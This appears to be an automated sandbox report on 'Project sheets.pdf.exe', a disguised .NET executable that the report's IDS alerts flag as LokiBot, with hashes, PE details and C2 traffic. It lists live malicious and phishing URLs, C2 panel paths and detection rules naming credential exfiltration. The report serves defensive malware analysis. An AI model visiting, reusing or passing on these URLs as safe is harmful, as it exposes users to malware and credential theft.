Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
188.114.97.3	Civil-Engineering-Co_77Q95QP0.exe	Get hash	malicious	Browse	idtetangede.cf/new/net_api
	TR0627729920002.exe	Get hash	malicious	Browse	www.trisuaka.xyz/uj3c/?aN68=XPUturKxIt&r4S0P=hHj17NHgKPiZmEi8MiFWNXc7sAIIGTvllA8De7wxS98Or+mtFTkVcIIMQhr+SfcB3JVi
	SecuriteInfo.com.Exploit.CVE-2017-0199.02.Gen.27968.xlsx	Get hash	malicious	Browse	xhvbzueifhdbjdfywete4y8va.cf/BN6/fre.php
	PFI_RF5030_page-0001.exe	Get hash	malicious	Browse	www.housewivesgonemad.com/fn9h/?3f=9rVX&iPvP4jt=ddRw5MT1wOjY3Kvw782dffYcLJJU3vKCW0wjqGHMHu5whXbe6A3I1ePAl3/zhcZ3XyulnlOEfMfjw01CWWKFH8v+7ClvUbBgIA==
	DT5a7gQIfc.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN5/fre.php
	SecuriteInfo.com.IL.Trojan.MSILZilla.22206.21605.exe	Get hash	malicious	Browse	www.yottatic.com/s4s9/?yjXXebZ=jEbUE/ixKAejIpqrb+hPhCZIEd2TtHWa5Vsjvuo2FdOv5NgX/fUtfpaCm/HodT+HivIY&jx=k8vP10IHTxqLB
	OVERDUE STATEMENT.exe	Get hash	malicious	Browse	www.true-bonanza.space/v8h0/?q2Jt0=GXSxAXaXor&7n=GcaHbmni5g0jw8MxGZX36ce6KF3k/i9sbD+WsBHK+AAmFNQpdLGXUk+/9DF8EZW1ewB/NLWxhg==
	n3MzXXD85s.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN5/fre.php
	q5gmz4tF6F.exe	Get hash	malicious	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN5/fre.php
	CgFJBVFNlg.exe	Get hash	malicious	Browse	www.showmyipaddress.com/
	IvAeW7TNgd.exe	Get hash	malicious	Browse	atomic-wallet.net/marsword/gate.php
	http://valdia.quatiappcn.pw	Get hash	malicious	Browse	valdia.quatiappcn.pw/favicon.ico
	Invoice SIL-EDI-0-2022-392.exe	Get hash	malicious	Browse	www.housewivesgonemad.com/fn9h/?0B=YPsXr&u2M=ddRw5MT1wOjY3Kvw7NbVcfUKPJErgeKCW0wjqGHMHu5whXbe6A3I1ezAl3/zhcZ3XyulnlOEfMfjw01CWWKFQtbIugd4U4x8Iw==
	vbc.exe	Get hash	malicious	Browse	www.aliensrent.com/gg5z/?e2MxDFO=7ZJ0JFkS6yiiZRblKk03y80/vQHx/IHNV7U5OWPtWhU6OpoCT2rWNv+5g/bA7gKMqTzwgUEOlQ1jL2NCVqOEjnydD8ezGI550Q==&5jlLU=C6Al
	MV. PACIFIC CARRIER.docx	Get hash	malicious	Browse	rotf.tk/vr64
	MV. PACIFIC CARRIER.docx	Get hash	malicious	Browse	rotf.tk/vr64
	Zahlung.exe	Get hash	malicious	Browse	www.rotate-mech.com/nt19/?3fcLnF=yiXn7oWziuHB8i/5vkh2BMRAg6laGmyiofwD3MYzyWCMQQu089U4cSYKGNKEj1LwCbwr&g2J=t6St0PnpMpH4SHk
	sH52jEJvY9.exe	Get hash	malicious	Browse	tixfilmz.tk/PWS/fre.php
	SecuriteInfo.com.W32.AIDetectNet.01.461.exe	Get hash	malicious	Browse	tixfilmz.tk/PWS/fre.php
	product_list_95849.exe	Get hash	malicious	Browse	www.kawkawtogel.org/jrut/?fBL42jSX=RTG6JFWhvNEJHJcZzyAxO8AV4S95btP/ignN5ZZu/FeIwtNl+qlDBU7Axum4PBZQVTq7womZmXNJO4n3xD2pW8EcaT8VJEA+oA==&ERqXj=D48hW0

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.W32.AIDetectNet.01.18072.exe	Get hash	malicious	Browse	104.18.115.97
	Doc11245.htm	Get hash	malicious	Browse	104.18.10.207
	https://lemissaire.tg/L0ck/	Get hash	malicious	Browse	104.17.25.14
	https://764827.selcdn.ru/share-point/sharepoint.html#ruth.harris@ashurst.com	Get hash	malicious	Browse	104.17.24.14
	https://invitee.notion.site/SAMCO-SALES-INC-facf804e29d14b018ace2c0ab9caf6ce	Get hash	malicious	Browse	172.64.154.162
	https://www.heroflooring.com/yopilesterer/peuvibed/dsendaremar/fixcder/x5I0r2/hello@yourdumb.com.au	Get hash	malicious	Browse	104.21.53.35
	https://indd.adobe.com/view/17d80112-3e5d-425d-adc1-a2d9ede7ebb2	Get hash	malicious	Browse	104.17.24.14
	https://smartsourcellc.nimbusweb.me/share/7407459/h1uk7p1mhlvcwzcpkw5f	Get hash	malicious	Browse	104.16.126.175
	http://promitattoos.com/	Get hash	malicious	Browse	188.114.97.3
	https://issuu.com/kdcocument/docs/09878675456789809?fr=sMjg4MDUyNzIxNDI	Get hash	malicious	Browse	104.17.24.14
	http://kingfaisalprize.org/	Get hash	malicious	Browse	104.26.7.42
	https://www.paperturn-view.com/?pid=MjY264454&v=1.1	Get hash	malicious	Browse	104.16.107.139
	http://recp.mkt51.net/ctt?m=27097482&r=NzgzMjA3MzI5NTYxS0&j=MjI0NDQyMzQ1NgS2&b=3&mt=1&rt=0&kx=1&kt=12&k=ShopName&kd=https://Gcgaming.digibuyers.ir/ber/?e=c2hhd24uZHVuY2FuQGdjZ2FtaW5nLmNvbQ==	Get hash	malicious	Browse	104.18.11.207
	https://www.paperturn-view.com/?pid=MjY264735&v=1.1	Get hash	malicious	Browse	104.17.25.14
	maldoc.html	Get hash	malicious	Browse	104.17.25.14
	#U260e#Ufe0f New Payment Request.htm	Get hash	malicious	Browse	188.114.96.3
	https://app.getresponse.com/click.html?x=a62b&lc=SNTQlu&mc=It&s=BIUpUo1&u=wkqNo&z=Ey5btDo&	Get hash	malicious	Browse	188.114.97.3
	injector.exe	Get hash	malicious	Browse	162.159.134.233
	modest-menu.exe	Get hash	malicious	Browse	188.114.97.3
	ACH_WIRE REMITTANCE.xlsx	Get hash	malicious	Browse	172.67.74.85
CLOUDFLARENETUS	SecuriteInfo.com.W32.AIDetectNet.01.18072.exe	Get hash	malicious	Browse	104.18.115.97
	Doc11245.htm	Get hash	malicious	Browse	104.18.10.207
	https://lemissaire.tg/L0ck/	Get hash	malicious	Browse	104.17.25.14
	https://764827.selcdn.ru/share-point/sharepoint.html#ruth.harris@ashurst.com	Get hash	malicious	Browse	104.17.24.14
	https://invitee.notion.site/SAMCO-SALES-INC-facf804e29d14b018ace2c0ab9caf6ce	Get hash	malicious	Browse	172.64.154.162
	https://www.heroflooring.com/yopilesterer/peuvibed/dsendaremar/fixcder/x5I0r2/hello@yourdumb.com.au	Get hash	malicious	Browse	104.21.53.35
	https://indd.adobe.com/view/17d80112-3e5d-425d-adc1-a2d9ede7ebb2	Get hash	malicious	Browse	104.17.24.14
	https://smartsourcellc.nimbusweb.me/share/7407459/h1uk7p1mhlvcwzcpkw5f	Get hash	malicious	Browse	104.16.126.175
	http://promitattoos.com/	Get hash	malicious	Browse	188.114.97.3
	https://issuu.com/kdcocument/docs/09878675456789809?fr=sMjg4MDUyNzIxNDI	Get hash	malicious	Browse	104.17.24.14
	http://kingfaisalprize.org/	Get hash	malicious	Browse	104.26.7.42
	https://www.paperturn-view.com/?pid=MjY264454&v=1.1	Get hash	malicious	Browse	104.16.107.139
	http://recp.mkt51.net/ctt?m=27097482&r=NzgzMjA3MzI5NTYxS0&j=MjI0NDQyMzQ1NgS2&b=3&mt=1&rt=0&kx=1&kt=12&k=ShopName&kd=https://Gcgaming.digibuyers.ir/ber/?e=c2hhd24uZHVuY2FuQGdjZ2FtaW5nLmNvbQ==	Get hash	malicious	Browse	104.18.11.207
	https://www.paperturn-view.com/?pid=MjY264735&v=1.1	Get hash	malicious	Browse	104.17.25.14
	maldoc.html	Get hash	malicious	Browse	104.17.25.14
	#U260e#Ufe0f New Payment Request.htm	Get hash	malicious	Browse	188.114.96.3
	https://app.getresponse.com/click.html?x=a62b&lc=SNTQlu&mc=It&s=BIUpUo1&u=wkqNo&z=Ey5btDo&	Get hash	malicious	Browse	188.114.97.3
	injector.exe	Get hash	malicious	Browse	162.159.134.233
	modest-menu.exe	Get hash	malicious	Browse	188.114.97.3
	ACH_WIRE REMITTANCE.xlsx	Get hash	malicious	Browse	172.67.74.85

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Project sheets.pdf.exe.log

Download File

Process:	C:\Users\user\Desktop\Project sheets.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.3467126928258955
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
MD5:	DD8B7A943A5D834CEEAB90A6BBBF4781
SHA1:	2BED8D47DF1C0FF76B40811E5F11298BD2D06389
SHA-256:	E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
SHA-512:	24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.523144496622303
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Project sheets.pdf.exe
File size:	177696
MD5:	b9ff215d1d69d1a6d7568eecc3ecd245
SHA1:	6f17bbed238dc4571db8b43fad392c6ef3b88fa5
SHA256:	c06061604c0d1be02e69e00ada53ceb9e2d5ba9d47f93fc20cafa149513a12e1
SHA512:	36c74d69a70f9faad528b5f91aa89ed040ac03a515121258b680188ba499322797e2103e7fa30464b0e823fe5df14d2d71cdd190ff67d5bab2d0aaeee47c2aa7
SSDEEP:	3072:QZiMlRrtGIepA7NKAs+fgobpWxuHAXTDlnD0y/Bv1vzuJJyL:QZiMzhGIeUhs5otWxugxgy/Bv1vzuJ
TLSH:	4C045B9D366035CFC95BD9729AA81C24EA2034BB530BC253A09725ADCE4DAD7CF191F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b@.b..............0..^...........\|... ........@.. ..............................DJ....`................................

File Icon


Icon Hash:	92aca8b2b2a2b286

Static PE Info

General

Entrypoint:	0x427c2e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62F44062 [Wed Aug 10 23:33:54 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	10/29/2013 5:00:00 PM 1/4/2017 4:00:00 AM
Subject Chain	CN=Wen Jia Liu, O=Wen Jia Liu, L=Sydney, S=New South Wales, C=AU
Version:	3
Thumbprint MD5:	FB7AAB26B203432685FBC0FF17F24045
Thumbprint SHA-1:	32387AEC09EB287F202E98398189B460F4C61A0D
Thumbprint SHA-256:	E0E85619EEF45FCE4421E4BA581060E43BBBF25911CD757DD081DA425DD1DB51
Serial:	0FF1EF66BD621C65B74B4DE41425717F

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x27bd4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28000	0x19c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x27c00	0x3a20
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x27b90	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x25c34	0x25e00	False	0.80277949669967	data	7.534046578744168	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x28000	0x19c8	0x1a00	False	0.3330829326923077	data	5.2485738132687745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x28168	0x10a8	data
RT_ICON	0x29210	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x29678	0x22	data
RT_VERSION	0x2969c	0x32c	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3188.114.97.349852802025381 08/11/22-06:43:38.361573	TCP	2025381	ET TROJAN LokiBot Checkin	49852	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349817802021641 08/11/22-06:43:11.901228	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49817	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349782802825766 08/11/22-06:42:50.570997	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49782	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349786802024313 08/11/22-06:42:53.219319	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349805802024318 08/11/22-06:43:09.287221	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349823802024313 08/11/22-06:43:13.321407	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49823	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349885802021641 08/11/22-06:43:55.376397	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49885	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349753802024318 08/11/22-06:42:25.207102	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349760802024318 08/11/22-06:42:32.923604	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49760	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349754802025381 08/11/22-06:42:26.308314	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349805802024313 08/11/22-06:43:09.287221	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349884802825766 08/11/22-06:43:54.330408	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49884	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349760802024313 08/11/22-06:42:32.923604	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349888802024313 08/11/22-06:44:00.133246	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49888	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349798802021641 08/11/22-06:43:06.576803	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349838802024313 08/11/22-06:43:24.421881	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49838	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349750802021641 08/11/22-06:42:21.832277	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349895802825766 08/11/22-06:44:06.157277	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49895	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349744802021641 08/11/22-06:42:15.052087	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349797802825766 08/11/22-06:43:05.379365	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49797	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349743802024312 08/11/22-06:42:14.045456	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49743	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349790802025381 08/11/22-06:42:56.651534	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349830802021641 08/11/22-06:43:16.837786	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49830	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349838802024318 08/11/22-06:43:24.421881	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49838	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349867802025381 08/11/22-06:43:45.824252	TCP	2025381	ET TROJAN LokiBot Checkin	49867	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349796802024318 08/11/22-06:43:04.193279	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49796	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349796802024313 08/11/22-06:43:04.193279	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349853802021641 08/11/22-06:43:40.660156	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49853	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349890802825766 08/11/22-06:44:03.457387	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49890	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349758802024318 08/11/22-06:42:30.656105	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349761802024313 08/11/22-06:42:34.002289	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349758802024313 08/11/22-06:42:30.656105	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349778802024318 08/11/22-06:42:46.945645	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349867802825766 08/11/22-06:43:45.824252	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49867	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349761802024318 08/11/22-06:42:34.002289	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349743802024317 08/11/22-06:42:14.045456	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49743	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349754802825766 08/11/22-06:42:26.308314	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49754	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349789802825766 08/11/22-06:42:55.412963	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49789	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349896802021641 08/11/22-06:44:07.789189	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49896	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349753802024313 08/11/22-06:42:25.207102	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349797802025381 08/11/22-06:43:05.379365	TCP	2025381	ET TROJAN LokiBot Checkin	49797	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349790802825766 08/11/22-06:42:56.651534	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49790	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349888802024318 08/11/22-06:44:00.133246	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49888	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349747802021641 08/11/22-06:42:18.537201	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349843802024318 08/11/22-06:43:31.924022	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49843	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349780802025381 08/11/22-06:42:49.154690	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349884802025381 08/11/22-06:43:54.330408	TCP	2025381	ET TROJAN LokiBot Checkin	49884	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349889802024313 08/11/22-06:44:01.764745	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49889	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349762802025381 08/11/22-06:42:35.961537	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349742802021641 08/11/22-06:42:12.661275	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349752802024318 08/11/22-06:42:24.044623	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349795802025381 08/11/22-06:43:03.020333	TCP	2025381	ET TROJAN LokiBot Checkin	49795	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349752802024313 08/11/22-06:42:24.044623	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.97.349789802025381 08/11/22-06:42:55.412963	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349843802021641 08/11/22-06:43:31.924022	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49843	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349745802021641 08/11/22-06:42:16.160936	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349889802024318 08/11/22-06:44:01.764745	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49889	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349811802025381 08/11/22-06:43:10.662100	TCP	2025381	ET TROJAN LokiBot Checkin	49811	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349762802825766 08/11/22-06:42:35.961537	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49762	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.97.349890802025381 08/11/22-06:44:03.457387	TCP	2025381	ET TROJAN LokiBot Checkin	49890	80	192.168.2.3	188.114.97.3
192.168.2.3188.114.96.349764802021641 08/11/22-06:42:41.209817	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.3	188.114.96.3
192.168.2.3188.114.96.349749802021641 08/11/22-06:42:20.745320	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.3	188.114.96.3
